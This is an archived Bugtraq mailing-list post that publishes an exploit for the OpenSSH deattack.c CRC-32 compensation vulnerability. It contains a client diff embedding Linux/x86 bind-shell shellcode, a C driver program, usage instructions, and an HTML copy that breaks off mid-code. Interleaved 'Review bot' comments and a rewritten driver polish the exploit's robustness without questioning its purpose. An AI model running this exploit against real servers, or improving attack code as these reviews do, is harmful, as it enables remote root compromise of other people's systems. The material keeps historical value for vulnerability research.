SSH CRC-32 Compensation Attack Detector Vulnerability Exploit
Date: Wed, 21 Feb 2001 06:38:15 -0000
From: Hugo Dias <bsphere@CLIX.PT>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: SSH CRC-32 Compensation Attack Detector Vulnerability Exploit
This is a multi-part message in MIME format.
------=_NextPart_000_0008_01C09BD0.DE9B5AC0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
This is the exploit for the bug in file deattack.c in the portable
version of openssh-2.2.0 (and possibly below).
We need to know several numbers for it to work, so it is very difficult
to use the exploit in the wild.
1. We need to know the EXACT distance from the variable "h" to the 2
last bytes of the saved EIP on the stack, in increments of 2 bytes.
2. This is the number that we place instead of the first two bytes
(the last two bytes are the first two bytes of the address).
Example : 0x0806d3de
We will replace 0x0806 with the address we want, so we will replace
0xde 0xd3 0x06 0x08 with 0xde 0xd3 0x0f 0x08,
which is the address of the buffer with the shellcode.
3. Packet Length
4. REAL packet length. The shellcode will go in the difference between these
two lengths, as the sshd server reads 8192(?) bytes at a time.
Then we need the host and the port number :)
Finally we need a small number that doesn't cause a SEG FAULT.
It doesn't matter how large it is, as long as it doesn't cause any
segmentation error.
It can be 0, 1, 2, 3, ...
Example :
./xp 30988 0 114200 117280 127.0.0.1 22 3
This works on Linux Mandrake 7.2 using "sshd -d" being debugged with GDB,
but it's possible to attach to an SSHD child with GDB and find the numbers we
need for this to work with the daemon. If the SSHD child doesn't SEG FAULT
in the beginning (we can do that easily by trying a few numbers) it will
take more than 10 seconds to process the packet, and that is sufficient to
attach to the process without changing its code and putting a "sleep(15)" in it.
We need to be root :) for doing this ...
Finding the numbers we need without being root is very difficult.
And without access to any user on the system at all it's even more difficult.
These addresses change with the platform, operating system, packet length...
BUT it's possible to do it (perhaps by reproducing exactly the victim environment),
and that's why I wrote this.
So as always: "Please upgrade your software"
Get the latest version of OpenSSH from:
http://www.openssh.com
- =
-------------------------------------------------------------------------=
-----------
I used a modified version of the openssh-2.3.0 (portable) SSH to produce the packet.
THESE FILES ARE FOR EDUCATIONAL PURPOSES ONLY.
Diff file to modify an ssh client for use with the exploit:
- =
-------------------------------------------------------------------------=
-----------
- --- packet.c Sat Oct 14 06:23:12 2000
+++ packet.c Tue Feb 20 09:33:00 2001
@@ -68,6 +68,85 @@
#define DBG(x)
#endif
=20
+
+/*
+ * Linux/x86
+ * TCP/36864 portshell (old, could be optimized further)
+ */
+
+char shellcode[] =3D /* anathema <anathema@hack.co.za> */
+/* main: */
+"\xeb\x72" /* jmp callz */
+/* start: */
+"\x5e" /* popl %esi */
+
+ /* socket() */
+"\x29\xc0" /* subl %eax, %eax */
+"\x89\x46\x10" /* movl %eax, 0x10(%esi) */
+"\x40" /* incl %eax */
+"\x89\xc3" /* movl %eax, %ebx */
+"\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */
+"\x40" /* incl %eax */
+"\x89\x46\x08" /* movl %eax, 0x08(%esi) */
+"\x8d\x4e\x08" /* leal 0x08(%esi), %ecx */
+"\xb0\x66" /* movb $0x66, %al */
+"\xcd\x80" /* int $0x80 */
+
+ /* bind() */
+"\x43" /* incl %ebx */
+"\xc6\x46\x10\x10" /* movb $0x10, 0x10(%esi) */
+"\x66\x89\x5e\x14" /* movw %bx, 0x14(%esi) */
+"\x88\x46\x08" /* movb %al, 0x08(%esi) */
+"\x29\xc0" /* subl %eax, %eax */
+"\x89\xc2" /* movl %eax, %edx */
+"\x89\x46\x18" /* movl %eax, 0x18(%esi) */
+"\xb0\x90" /* movb $0x90, %al */
+"\x66\x89\x46\x16" /* movw %ax, 0x16(%esi) */
+"\x8d\x4e\x14" /* leal 0x14(%esi), %ecx */
+"\x89\x4e\x0c" /* movl %ecx, 0x0c(%esi) */
+"\x8d\x4e\x08" /* leal 0x08(%esi), %ecx */
+"\xb0\x66" /* movb $0x66, %al */
+"\xcd\x80" /* int $0x80 */
+
+ /* listen() */
+"\x89\x5e\x0c" /* movl %ebx, 0x0c(%esi) */
+"\x43" /* incl %ebx */
+"\x43" /* incl %ebx */
+"\xb0\x66" /* movb $0x66, %al */
+"\xcd\x80" /* int $0x80 */
+
+ /* accept() */
+"\x89\x56\x0c" /* movl %edx, 0x0c(%esi) */
+"\x89\x56\x10" /* movl %edx, 0x10(%esi) */
+"\xb0\x66" /* movb $0x66, %al */
+"\x43" /* incl %ebx */
+"\xcd\x80" /* int $0x80 */
+
+ /* dup2(s, 0); dup2(s, 1); dup2(s, 2); */
+"\x86\xc3" /* xchgb %al, %bl */
+"\xb0\x3f" /* movb $0x3f, %al */
+"\x29\xc9" /* subl %ecx, %ecx */
+"\xcd\x80" /* int $0x80 */
+"\xb0\x3f" /* movb $0x3f, %al */
+"\x41" /* incl %ecx */
+"\xcd\x80" /* int $0x80 */
+"\xb0\x3f" /* movb $0x3f, %al */
+"\x41" /* incl %ecx */
+"\xcd\x80" /* int $0x80 */
+
+ /* execve() */
+"\x88\x56\x07" /* movb %dl, 0x07(%esi) */
+"\x89\x76\x0c" /* movl %esi, 0x0c(%esi) */
+"\x87\xf3" /* xchgl %esi, %ebx */
+"\x8d\x4b\x0c" /* leal 0x0c(%ebx), %ecx */
+"\xb0\x0b" /* movb $0x0b, %al */
+"\xcd\x80" /* int $0x80 */
+
+/* callz: */
+"\xe8\x89\xff\xff\xff" /* call start */
+"/bin/sh";
+
+
/*
* This variable contains the file descriptors used for communicating =
with
* the other side. connection_in is used for reading; connection_out =
for
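Review bot: `shellcode` is added as a writable, externally visible global although the only use in this patch reads it (`memcpy(...,&shellcode,strlen(shellcode))` in the packet_write_poll hunk), so `static const char shellcode[] = ...` is the conventional form and keeps the name out of the link namespace; the same applies to `int count = 0;` in the `@@ -125,6 +204,9 @@` hunk, which should be `static int count = 0;`. The header comment carries the attribution and the port but not what the byte string is for in this file; a line such as `/* copied into the rewritten output buffer by packet_write_poll() when count == 2 */` would tie it to its use. Note also that `strlen(shellcode)` is later used as its length, which depends on no byte of the string being zero; `sizeof shellcode - 1` states the length without that dependency.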
@@ -125,6 +204,9 @@
/* Session key information for Encryption and MAC */
Kex *kex =3D NULL;
=20
+/* Packet Number */
+int count =3D 0;
+
void
packet_set_kex(Kex *k)
{
@@ -461,6 +543,8 @@
unsigned int checksum;
u_int32_t rand =3D 0;
=20
+ count++;
+
/*
* If using packet compression, compress the payload of the outgoing
* packet.
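Review bot: The bare `count++` is what arms the `count == 2` rewrite in packet_write_poll, and nothing near it says so; a comment such as `/* packet sequence number: packet_write_poll() rewrites the output buffer when this reaches 2 and increments it again so the rewrite appears to happen once */` would explain both increments in one place. The enclosing function starts and ends outside the hunk.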
@@ -1172,7 +1256,64 @@
void
packet_write_poll()
{
- - int len =3D buffer_len(&output);
+ int len;
+ char buf[50],*p,*ptr;
+ char code[270000];
+ long sz;
+ FILE *f;=20
+
+ if (count =3D=3D 2)
+ {
+ f =3D fopen("/tmp/code","r");
+ fgets(buf,28,f);=20
+ fclose(f); =20
+
+ sz =3D GET_32BIT(&buf[24]);
+ buffer_clear(&output);
+ buffer_append(&output,code,sz);=20
+=20
+ len =3D buffer_len(&output);
+
+ ptr =3D buffer_ptr(&output);=20
+
+ for(p =3D ptr + 4 ; p < ptr + GET_32BIT(&buf[16]) ; p+=3D8)
+ {
+ *p=3Dbuf[0];
+ *(p+1)=3Dbuf[1];
+ *(p+2)=3Dbuf[2];
+ *(p+3)=3Dbuf[3];
+ *(p+4)=3Dbuf[4];
+ *(p+5)=3Dbuf[5];
+ *(p+6)=3Dbuf[6];
+ *(p+7)=3Dbuf[7];
+ }
+
+ sz =3D ((GET_32BIT(&buf[20]) + 8) & ~7);
+
+ for(p =3D p ; p < ptr + sz ; p+=3D8)
+ {
+ *p=3Dbuf[8];
+ *(p+1)=3Dbuf[9];
+ *(p+2)=3Dbuf[10];
+ *(p+3)=3Dbuf[11];
+ *(p+4)=3Dbuf[12];
+ *(p+5)=3Dbuf[13];
+ *(p+6)=3Dbuf[14];
+ *(p+7)=3Dbuf[15];
+ }
+
+ sz =3D len - GET_32BIT(&buf[20]);
+=20
+ memset(p,'\x90',sz);
+ memcpy(p+sz-strlen(shellcode)-16,&shellcode,strlen(shellcode));
+ memcpy(ptr,&buf[20],4);=20
+
+ count++;
+ }
+
+ len =3D buffer_len(&output);
+
+
if (len > 0) {
len =3D write(connection_out, buffer_ptr(&output), len);
if (len <=3D 0) {
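Review bot: `fopen("/tmp/code","r")` and `fgets(buf,28,f)` are both unchecked, so a missing file dereferences a NULL `FILE *`, and fgets is a text read that stores at most 27 bytes and stops at a newline, while the companion listing produces the file with a raw `write(f,buffer,28)`, so `buf[27]` (consumed by `GET_32BIT(&buf[24])`) is never file data. A checked binary read, `if (f == NULL || fread(buf, 1, 28, f) != 28) { fclose(f); return; }`, is what the fixed 28-byte layout assumes. `code[270000]` is an automatic array that is copied by `buffer_append(&output,code,sz)` before anything is stored in it, which reads indeterminate values (undefined behaviour even though most of the region is overwritten afterwards), and `sz`, taken from the file, is never bounded by `sizeof code`. `/tmp/code` is a fixed name in a shared directory, which deserves at least a comment about who is expected to own it. packet_write_poll continues past the end of the hunk.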
@@ -1299,3 +1440,4 @@
max_packet_size =3D s;
return s;
}
+
- =
-------------------------------------------------------------------------=
-----------
/*
THIS FILE IS FOR EDUCATIONAL PURPOSES ONLY.
BlackSphere - Hugo Oliveira Dias
Tue Feb 20 16:18:00 2001
Email: bsphere@clix.pt
Homepage: http://planeta.clix.pt/bsphere
Exploit code for use with the modified ssh
*/
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
/* Path to modified ssh */
#define PATH_SSH "./ssh"
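/*
 * Parse an unsigned decimal argument into a 32-bit word.
 * Returns 0 on success, -1 when the text is not a plain decimal number or
 * does not fit in 32 bits.
 */
static int parse_u32(const char *s, uint32_t *out)
{
    char *end;
    errno = 0;
    unsigned long v = strtoul(s, &end, 10);
    if (end == s || *end != '\0' || errno == ERANGE || v > UINT32_MAX) {
        return -1;
    }
    *out = (uint32_t)v;
    return 0;
}

/*
 * Store w at p in big-endian byte order.  The patched client decodes the
 * file with GET_32BIT(), and the original byte-swap loop produced exactly
 * this order on a little-endian host; writing the bytes explicitly makes
 * the output independent of host endianness and of sizeof(long).
 */
static void put_be32(unsigned char *p, uint32_t w)
{
    p[0] = (unsigned char)(w >> 24);
    p[1] = (unsigned char)(w >> 16);
    p[2] = (unsigned char)(w >> 8);
    p[3] = (unsigned char)w;
}

/*
 * Write the seven 32-bit parameters the patched ssh client reads from
 * /tmp/code, print them, then run that client against <host>:<port>.
 *
 * argv[1] saved eip      argv[2] count      argv[3] packet length
 * argv[4] username length argv[5] host      argv[6] port
 * argv[7] h(i)
 *
 * Returns 1 on a usage, conversion or I/O error.  On success the process
 * image is replaced by the ssh client (execl), so main does not return.
 */
int main(int argc, char *argv[])
{
    enum { NWORDS = 7, CODE_LEN = NWORDS * 4 };
    uint32_t words[NWORDS] = {0};
    unsigned char code[CODE_LEN];
    uint32_t eip_off, count, pkt_len, user_len, hi;
    char portstr[16];
    char *end;
    long port;
    int fd;

    if (argc < 8) {
        fprintf(stderr,
                "\nUsage : %s <saved eip> <count> <packet length> <username length> <host> <port> <h(i)>\n\n",
                argv[0]);
        return 1;
    }

    if (parse_u32(argv[1], &eip_off) != 0 || parse_u32(argv[2], &count) != 0 ||
        parse_u32(argv[3], &pkt_len) != 0 || parse_u32(argv[4], &user_len) != 0 ||
        parse_u32(argv[7], &hi) != 0) {
        fprintf(stderr, "%s: numeric arguments must be unsigned decimal values\n", argv[0]);
        return 1;
    }

    errno = 0;
    port = strtol(argv[6], &end, 10);
    if (end == argv[6] || *end != '\0' || errno == ERANGE || port < 1 || port > 65535) {
        fprintf(stderr, "%s: invalid port '%s'\n", argv[0], argv[6]);
        return 1;
    }

    /*
     * Word layout consumed by the patched packet_write_poll().  The two
     * constants are the author's fixed bases and are kept as given; the
     * additions wrap modulo 2^32 exactly as the original 32-bit build did.
     */
    words[0] = 1543007393u + eip_off;
    words[1] = 0;
    words[2] = hi;
    words[3] = 0;
    words[4] = 16520u + count;
    words[5] = pkt_len;
    words[6] = user_len;
    for (size_t i = 0; i < NWORDS; i++) {
        put_be32(code + 4 * i, words[i]);
    }

    /* Same report as before; values are widened so the conversions match. */
    printf("\nSaved Eip : &h + %lu", (unsigned long)words[0]);
    printf("\nReturn Address : 0x%lxxxxx", (unsigned long)(words[4] / 8));
    printf("\nPacket Length : %lu", (unsigned long)((pkt_len + 8) & ~7u));
    printf("\nUsername Length : %lu\n\n", (unsigned long)user_len);
    fflush(stdout);

    /*
     * NOTE(review): the patched client reads this fixed name, so the path in
     * a shared /tmp cannot be changed here alone.  The file is created
     * owner-read/write only and truncated so stale contents are not reused.
     */
    fd = open("/tmp/code", O_WRONLY | O_CREAT | O_TRUNC, S_IRUSR | S_IWUSR);
    if (fd < 0) {
        perror("/tmp/code");
        return 1;
    }
    if (write(fd, code, sizeof code) != (ssize_t)sizeof code) {
        perror("/tmp/code");
        close(fd);
        return 1;
    }
    if (close(fd) != 0) {
        perror("/tmp/code");
        return 1;
    }

    /* Show the command line, then exec with an explicit argv so argv[5] never reaches a shell. */
    snprintf(portstr, sizeof portstr, "%ld", port);
    printf("%s -p %s -v -l root %s\n", PATH_SSH, portstr, argv[5]);
    fflush(stdout);
    execl(PATH_SSH, PATH_SSH, "-p", portstr, "-v", "-l", "root", argv[5], (char *)NULL);
    perror(PATH_SSH);
    return 1;
}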
- =
-------------------------------------------------------------------------=
-----------
BlackSphere - Hugo Oliveira Dias - 20 Fev 2001
Email: bsphere@clix.pt
Homepage: http://planeta.clix.pt/bsphere
- =
-------------------------------------------------------------------------=
-----------
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>
iQA/AwUBOpK/xBmmBmSsB+85EQLAWACgzdeSqpGTpz+TklsupMD5/KUCt6UAn248
J2jw4HBHgb7MHR/vfYqMDY3l
=3DOD22
-----END PGP SIGNATURE-----
------=_NextPart_000_0008_01C09BD0.DE9B5AC0
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; =
charset=3Diso-8859-1">
<META content=3D"MSHTML 5.50.4134.100" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT face=3DArial size=3D2>-----BEGIN PGP SIGNED =
MESSAGE-----<BR>Hash:=20
SHA1</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>This is the exploit for the bug in file =
deattack.c=20
in the portable<BR>version of openssh-2.2.0 (and possible =
below).</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>We need to know several numbers for it =
to work so=20
it's very difficult <BR>to use the exploit on the wild.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>1. We need to know is the EXACT =
distance of the=20
variable "h" to the 2 <BR> last bytes of the saved EIP in =
the stack=20
with an increment of 2 bytes.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>2. This is the number that we place =
instead of the=20
two first bytes.<BR> (last two bytes are the first two bytes =
of the=20
address)<BR> Example : 0x0806d3de <BR> We =
will=20
replace 0x0806 for the address we want, so we will replace<BR> 0xde =
0xd3=20
0x06 0x08 for 0xde 0xd3 0x0f 0x08<BR> that is the address of the =
buffer=20
with the shellcode.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>3. Packet Length</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>4. REAL packet length. The shellcode =
will go in the=20
difference between this<BR> two lengths,as the sshd server =
reads=20
8192(?) bytes at time .</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>Then we need the host and the port =
number :)=20
</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>Finnaly we kneed a small number that =
doesn=B4t cause=20
SEG FAULT.<BR>It doesn=B4t matter how large is it as long as it doesn't =
cause any=20
<BR>segment error.<BR>It can be 0,1,2,3,...</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>Example :</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>./xp 30988 0 114200 117280 127.0.0.1 22 =
3</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>This works on Linux Mandrake 7.2 using =
"sshd -d"=20
being debugged with GDB,<BR>but it's possible to attach a SSHD child =
with GDB=20
and find the numbers we <BR>need for this to work with the daemon.If the =
SSHD=20
child doesn't SEG FAULT<BR>in the beggining (we can do that easily by =
trying a=20
few numbers) it will<BR>take more than 10 seconds to process the packet =
and that=20
is sufficient to<BR>attach the process without changing its code and put =
a=20
"sleep(15)" in it.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>We need to be root :) for doing this =
...<BR>Finding=20
the numbers we need without being root is very difficult.<BR>And without =
no=20
access to any user in the system at all its even more difficult.<BR>This =
addresses changes with the plataform,operating system,packet=20
length...</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>BUT its possible to do it (pheraps by =
reproducing=20
exactly the victim environment)<BR>and thats why i wrote =
this.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>So as allways : "Please upgrade your=20
software"</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>Get the last version of OpenSSH from :=20
</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial size=3D2><A=20
href=3D"http://www.openssh.com">http://www.openssh.com</A></FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV><FONT face=3DArial =
size=3D2>
<DIV><BR>-=20
-------------------------------------------------------------------------=
-----------<BR>I=20
used a modified version of the openssh-2.3.0 (portable) SSH to produce =
the=20
packet.</DIV>
<DIV> </DIV>
<DIV>THIS FILES ARE FOR EDUCATIONAL PURPOSE ONLY.</DIV>
<DIV> </DIV>
<DIV>Diff file to modify an ssh client for using it with the exploit =
:<BR>-=20
-------------------------------------------------------------------------=
-----------</DIV>
<DIV> </DIV>
<DIV>- --- packet.c Sat Oct 14 06:23:12 2000<BR>+++ =
packet.c Tue Feb=20
20 09:33:00 2001<BR>@@ -68,6 +68,85 @@<BR> #define=20
DBG(x)<BR> #endif<BR> <BR>+<BR>+/*<BR>+ * Linux/x86<BR>+ =
* =20
TCP/36864 portshell (old, could be optimized further)<BR>+ =
*/<BR>+<BR>+char=20
shellcode[] =3D /* anathema <<A=20
href=3D"mailto:anathema@hack.co.za">anathema@hack.co.za</A>> =
*/<BR>+/* main:=20
*/<BR>+"\xeb\x72" &n=
bsp; &nb=
sp; =20
/* jmp=20
callz &n=
bsp; =20
*/<BR>+/* start:=20
*/<BR>+"\x5e" =
&=
nbsp; &n=
bsp;=20
/* popl=20
%esi &nb=
sp; =20
*/<BR>+<BR>+ /* socket()=20
*/<BR>+"\x29\xc0" &n=
bsp; &nb=
sp; =20
/* subl %eax, %eax =20
*/<BR>+"\x89\x46\x10" &nbs=
p;  =
; =20
/* movl %eax, 0x10(%esi) =20
*/<BR>+"\x40" =
&=
nbsp; &n=
bsp;=20
/* incl=20
%eax &nb=
sp; =20
*/<BR>+"\x89\xc3" &n=
bsp; &nb=
sp; =20
/* movl %eax, %ebx =20
*/<BR>+"\x89\x46\x0c" &nbs=
p;  =
; =20
/* movl %eax, 0x0c(%esi) =20
*/<BR>+"\x40" =
&=
nbsp; &n=
bsp;=20
/* incl=20
%eax &nb=
sp; =20
*/<BR>+"\x89\x46\x08" &nbs=
p;  =
; =20
/* movl %eax, 0x08(%esi) =20
*/<BR>+"\x8d\x4e\x08" &nbs=
p;  =
; =20
/* leal 0x08(%esi), %ecx =20
*/<BR>+"\xb0\x66" &n=
bsp; &nb=
sp; =20
/* movb $0x66, %al =20
*/<BR>+"\xcd\x80" &n=
bsp; &nb=
sp; =20
/* int=20
$0x80 &n=
bsp; =20
*/<BR>+<BR>+ /* bind()=20
*/<BR>+"\x43" =
&=
nbsp; &n=
bsp;=20
/* incl=20
%ebx &nb=
sp; =20
*/<BR>+"\xc6\x46\x10\x10" =
&=
nbsp; =20
/* movb $0x10, 0x10(%esi) =20
*/<BR>+"\x66\x89\x5e\x14" =
&=
nbsp; =20
/* movw %bx, 0x14(%esi) =20
*/<BR>+"\x88\x46\x08" &nbs=
p;  =
; =20
/* movb %al, 0x08(%esi) =20
*/<BR>+"\x29\xc0" &n=
bsp; &nb=
sp; =20
/* subl %eax, %eax =20
*/<BR>+"\x89\xc2" &n=
bsp; &nb=
sp; =20
/* movl %eax, %edx =20
*/<BR>+"\x89\x46\x18" &nbs=
p;  =
; =20
/* movl %eax, 0x18(%esi) =20
*/<BR>+"\xb0\x90" &n=
bsp; &nb=
sp; =20
/* movb $0x90, %al =20
*/<BR>+"\x66\x89\x46\x16" =
&=
nbsp; =20
/* movw %ax, 0x16(%esi) =20
*/<BR>+"\x8d\x4e\x14" &nbs=
p;  =
; =20
/* leal 0x14(%esi), %ecx =20
*/<BR>+"\x89\x4e\x0c" &nbs=
p;  =
; =20
/* movl %ecx, 0x0c(%esi) =20
*/<BR>+"\x8d\x4e\x08" &nbs=
p;  =
; =20
/* leal 0x08(%esi), %ecx =20
*/<BR>+"\xb0\x66" &n=
bsp; &nb=
sp; =20
/* movb $0x66, %al =20
*/<BR>+"\xcd\x80" &n=
bsp; &nb=
sp; =20
/* int=20
$0x80 &n=
bsp; =20
*/<BR>+<BR>+ /* listen()=20
*/<BR>+"\x89\x5e\x0c" &nbs=
p;  =
; =20
/* movl %ebx, 0x0c(%esi) =20
*/<BR>+"\x43" =
&=
nbsp; &n=
bsp;=20
/* incl=20
%ebx &nb=
sp; =20
*/<BR>+"\x43" =
&=
nbsp; &n=
bsp;=20
/* incl=20
%ebx &nb=
sp; =20
*/<BR>+"\xb0\x66" &n=
bsp; &nb=
sp; =20
/* movb $0x66, %al =20
*/<BR>+"\xcd\x80" &n=
bsp; &nb=
sp; =20
/* int=20
$0x80 &n=
bsp; =20
*/<BR>+<BR>+ /* accept()=20
*/<BR>+"\x89\x56\x0c" &nbs=
p;  =
; =20
/* movl %edx, 0x0c(%esi) =20
*/<BR>+"\x89\x56\x10" &nbs=
p;  =
; =20
/* movl %edx, 0x10(%esi) =20
*/<BR>+"\xb0\x66" &n=
bsp; &nb=
sp; =20
/* movb $0x66, %al =20
*/<BR>+"\x43" =
&=
nbsp; &n=
bsp;=20
/* incl=20
%ebx &nb=
sp; =20
*/<BR>+"\xcd\x80" &n=
bsp; &nb=
sp; =20
/* int=20
$0x80 &n=
bsp; =20
*/<BR>+<BR>+ /* dup2(s, 0); dup2(s, 1); dup2(s, 2);=20
*/<BR>+"\x86\xc3" &n=
bsp; &nb=
sp; =20
/* xchgb %al, %bl =20
*/<BR>+"\xb0\x3f" &n=
bsp; &nb=
sp; =20
/* movb $0x3f, %al =20
*/<BR>+"\x29\xc9" &n=
bsp; &nb=
sp; =20
/* subl %ecx, %ecx =20
*/<BR>+"\xcd\x80" &n=
bsp; &nb=
sp; =20
/* int=20
$0x80 &n=
bsp; =20
*/<BR>+"\xb0\x3f" &n=
bsp; &nb=
sp; =20
/* movb $0x3f, %al =20
*/<BR>+"\x41" =
&=
nbsp; &n=
bsp;=20
/* incl=20
%ecx &nb=
sp; =20
*/<BR>+"\xcd\x80" &n=
bsp; &nb=
sp; =20
/* int=20
$0x80 &n=
bsp; =20
*/<BR>+"\xb0\x3f" &n=
bsp; &nb=
sp; =20
/* movb $0x3f, %al =20
*/<BR>+"\x41" =
&=
nbsp; &n=
bsp;=20
/* incl=20
%ecx &nb=
sp; =20
*/<BR>+"\xcd\x80" &n=
bsp; &nb=
sp; =20
/* int=20
$0x80 &n=
bsp; =20
*/<BR>+<BR>+ /* execve()=20
*/<BR>+"\x88\x56\x07" &nbs=
p;  =
; =20
/* movb %dl, 0x07(%esi) =20
*/<BR>+"\x89\x76\x0c" &nbs=
p;  =
; =20
/* movl %esi, 0x0c(%esi) =20
*/<BR>+"\x87\xf3" &n=
bsp; &nb=
sp; =20
/* xchgl %esi, %ebx =20
*/<BR>+"\x8d\x4b\x0c" &nbs=
p;  =
; =20
/* leal 0x0c(%ebx), %ecx =20
*/<BR>+"\xb0\x0b" &n=
bsp; &nb=
sp; =20
/* movb $0x0b, %al =20
*/<BR>+"\xcd\x80" &n=
bsp; &nb=
sp; =20
/* int=20
$0x80 &n=
bsp; =20
*/<BR>+<BR>+/* callz:=20
*/<BR>+"\xe8\x89\xff\xff\xff" &n=
bsp; =20
/* call=20
start &n=
bsp; =20
*/<BR>+"/bin/sh";<BR>+<BR>+<BR> /*<BR> * This variable =
contains the=20
file descriptors used for communicating with<BR> * the other =
side. =20
connection_in is used for reading; connection_out for<BR>@@ -125,6 =
+204,9=20
@@<BR> /* Session key information for Encryption and MAC=20
*/<BR> Kex *kex =3D NULL;<BR> <BR>+/* Packet Number =
*/<BR>+int=20
count =3D 0;<BR>+<BR> void<BR> packet_set_kex(Kex =
*k)<BR> {<BR>@@=20
-461,6 +543,8 @@<BR> unsigned int =
checksum;<BR> u_int32_t=20
rand =3D =
0;<BR> <BR>+ count++;<BR>+<BR> /*<BR> * =
If using packet compression, compress the payload of the=20
outgoing<BR> * packet.<BR>@@ -1172,7 +1256,64=20
@@<BR> void<BR> packet_write_poll()<BR> {<BR>- - int =
len =3D=20
buffer_len(&output);<BR>+ int len;<BR>+ char=20
buf[50],*p,*ptr;<BR>+ char code[270000];<BR>+ long =
sz;<BR>+ FILE=20
*f; <BR>+<BR>+ if (count =3D=3D 2)<BR>+ {<BR>+ f =
=3D=20
fopen("/tmp/code","r");<BR>+ fgets(buf,28,f); <BR>+ =20
fclose(f); <BR>+<BR>+ sz =3D =
GET_32BIT(&buf[24]);<BR>+ =20
buffer_clear(&output);<BR>+ =
buffer_append(&output,code,sz);=20
<BR>+ <BR>+ len =3D buffer_len(&output);<BR>+<BR>+ =
ptr=20
=3D buffer_ptr(&output); <BR>+<BR>+ for(p =3D ptr + 4 ; p =
< ptr +=20
GET_32BIT(&buf[16]) ; p+=3D8)<BR>+ =20
{<BR>+ *p=3Dbuf[0];<BR>+ *(p+1)=3Dbuf[1];<BR>+ =
; *(p+2)=3Dbuf[2];<BR>+ *(p+3)=3Dbuf[3];<BR>+ =
*(p+4)=3Dbuf[4];<BR>+ *(p+5)=3Dbuf[5];<BR>+ *(p+6)=3D=
buf[6];<BR>+ *(p+7)=3Dbuf[7];<BR>+ =20
}<BR>+<BR>+ sz =3D ((GET_32BIT(&buf[20]) + 8) & =
~7);<BR>+<BR>+ =20
for(p =3D p ; p < ptr + sz ; p+=3D8)<BR>+ =20
{<BR>+ *p=3Dbuf[8];<BR>+ *(p+1)=3Dbuf[9];<BR>+ =
; *(p+2)=3Dbuf[10];<BR>+ *(p+3)=3Dbuf[11];<BR>+ &nbs=
p;*(p+4)=3Dbuf[12];<BR>+ *(p+5)=3Dbuf[13];<BR>+ *(p=
+6)=3Dbuf[14];<BR>+ *(p+7)=3Dbuf[15];<BR>+ =20
}<BR>+<BR>+ sz =3D len - =
GET_32BIT(&buf[20]);<BR>+ <BR>+ =20
memset(p,'\x90',sz);<BR>+ =20
memcpy(p+sz-strlen(shellcode)-16,&shellcode,strlen(shellcode));<BR>+&=
nbsp;=20
memcpy(ptr,&buf[20],4); <BR>+<BR>+ =20
count++;<BR>+ }<BR>+<BR>+ len =3D=20
buffer_len(&output);<BR>+<BR>+<BR> if (len > 0)=20
{<BR> len =3D write(connection_out, =
buffer_ptr(&output),=20
len);<BR> if (len <=3D 0) {<BR>@@ -1299,3 +1440,4=20
@@<BR> max_packet_size =3D s;<BR> return=20
s;<BR> }<BR>+</DIV>
<DIV> </DIV>
<DIV>-=20
-------------------------------------------------------------------------=
-----------</DIV>
<DIV> </DIV>
<DIV>/* </DIV>
<DIV> </DIV>
<DIV>THIS FILE IS FOR EDUCATIONAL PURPOSE ONLY.</DIV>
<DIV> </DIV>
<DIV>BlackSphere - Hugo Oliveira Dias<BR>Tue Feb 20 16:18:00 2001</DIV>
<DIV> </DIV>
<DIV>Email: <A =
href=3D"mailto:bsphere@clix.pt">bsphere@clix.pt</A><BR>Homepage: <A=20
href=3D"http://planeta.clix.pt/bsphere">http://planeta.clix.pt/bsphere</A=
></DIV>
<DIV> </DIV>
<DIV>Exploit code for using the modified ssh</DIV>
<DIV> </DIV>
<DIV>*/<BR>#include <stdio.h><BR>#include =
<stdlib.h><BR>#include=20
<unistd.h><BR>#include <sys/types.h><BR>#include=20
<sys/stat.h><BR>#include <fcntl.h></DIV>
<DIV> </DIV>
<DIV>/* Path to modified ssh */<BR>#define PATH_SSH "./ssh"</DIV>
<DIV> </DIV>
<DIV>int main(int argc,char *argv[])<BR>{<BR> int f;<BR> int=20
port;<BR> unsigned long addr,*ptr;<BR> char=20
*buffer,*aux,ch,*ssh;<BR> int i;</DIV>
<DIV> </DIV>
<DIV> if (argc < 8)<BR> {<BR> printf("\nUsage : %s =
<saved=20
eip> <count> <packet length> <username length> =
<host>=20
\<BR><port> <h(i)>\n\n",argv[0]);<BR> <BR> =20
fflush(stdout);<BR> _exit(0);<BR> }</DIV>
<DIV> </DIV>
<DIV> port=3Datoi(argv[6]);</DIV>
